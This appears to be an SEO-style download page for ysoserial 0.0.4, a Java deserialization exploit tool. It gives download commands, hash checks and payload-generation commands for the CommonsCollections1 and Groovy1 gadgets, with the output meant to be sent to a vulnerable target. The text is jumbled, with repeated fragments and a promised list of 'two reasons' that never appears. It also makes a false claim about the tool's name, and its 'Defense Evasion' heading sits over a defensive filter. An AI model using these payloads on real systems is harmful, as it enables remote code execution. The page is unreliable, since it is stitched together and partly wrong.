Download - Ysoserial-0.0.4-all.jar

Once you have the file, usage is standard across most versions. Ensure you have Java installed (preferably Java 7 or 8 for legacy compatibility with this specific JAR version).

Basic Syntax:

java -jar ysoserial-0.0.4-all.jar [gadget] [command]

Example: If you are testing a Linux machine for the classic Apache Commons Collections vulnerability (Collections 3.2.1), you might generate a payload that opens a calculator (a standard proof-of-concept) or runs a shell command.

java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "touch /tmp/pwned"

This command outputs a stream of raw bytes. You would typically pipe this output into a file or a network request sent to the vulnerable target application. ysoserial-0.0.4-all.jar download

sha256sum ysoserial-0.0.4-all.jar

Get-FileHash ysoserial-0.0.4-all.jar -Algorithm SHA256

If the output matches the official hash, the file is safe.

Once executed via java -jar ysoserial-0.0.4-all.jar, the tool generates a serialized payload. Example:

java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "calc.exe" > payload.ser

Defense Evasion in v0.0.4:

Example JVM parameter:

-Djdk.serialFilter=!org.apache.commons.*;!org.codehaus.groovy.*

https://github.com/frohoff/ysoserial/releases/download/v0.0.4/ysoserial-0.0.4-all.jar

Instructions:

wget https://github.com/frohoff/ysoserial/releases/download/v0.0.4/ysoserial-0.0.4-all.jar

Or with curl:

curl -LO https://github.com/frohoff/ysoserial/releases/download/v0.0.4/ysoserial-0.0.4-all.jar

On Windows, you can also download directly via browser by pasting the URL.

While the project is currently on versions 0.0.6+ (and active forks go even further), version 0.0.4 is often sought after for two reasons:

java -jar ysoserial-0.0.4-all.jar Groovy1 'touch /tmp/pwned' > payload.ser

ysoserial is a proof-of-concept tool that generates Java deserialization payloads. It exploits the fact that many Java libraries and applications deserialize untrusted data without proper validation. The tool chains together various "gadget chains"—existing classes and methods in common Java libraries (like Apache Commons Collections, Spring, Groovy, etc.)—to execute arbitrary commands or code. Once you have the file, usage is standard

The name "ysoserial" is a play on "JSON serialization," but its real power lies in binary Java serialization.

Made on
ysoserial-0.0.4-all.jar download
Tilda